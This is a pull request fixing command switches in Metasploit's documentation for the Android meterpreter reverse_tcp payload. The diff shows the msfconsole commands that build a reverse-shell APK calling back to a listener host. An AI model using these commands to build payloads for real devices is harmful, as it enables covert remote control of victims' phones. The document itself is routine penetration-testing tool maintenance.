### PR TITLE
Update reverse_tcp.md, improper switches

### DIFF
--- a/documentation/modules/payload/android/meterpreter/reverse_tcp.md
+++ b/documentation/modules/payload/android/meterpreter/reverse_tcp.md
@@ -37,7 +37,7 @@ To create the APK with `msfconsole`:
 msf > use payload/android/meterpreter/reverse_tcp 
 msf payload(reverse_tcp) > set LHOST 192.168.1.199
 LHOST => 192.168.1.199
-msf payload(reverse_tcp) > generate -t raw -f /tmp/android.apk
+msf payload(reverse_tcp) > generate -f raw -o /tmp/android.apk
 [*] Writing 8992 bytes to /tmp/android.apk...
 msf payload(reverse_tcp) >
 ```


### PR DESCRIPTION
Improper usages of switches are presented in the documentation for the android meterpreter payload reverse_tcp. The example given for generating an APK file from the msfconsole showed two errors. 

The example given in the documentation for generating a meterpreter payload apk file from the msfconsole was "generate -t raw -f /tmp/android.apk" This example, when executed, results in a return of the command manual page due to improper command usage. 

The correct command to generate a raw format payload with a "/tmp/android.apk" filename designation would be "generate -f raw -o /tmp/android.apk" 

TLDR; In line 40 of reverse_tcp.md replace "-t' with "-f" and replace "-f" with "-o".



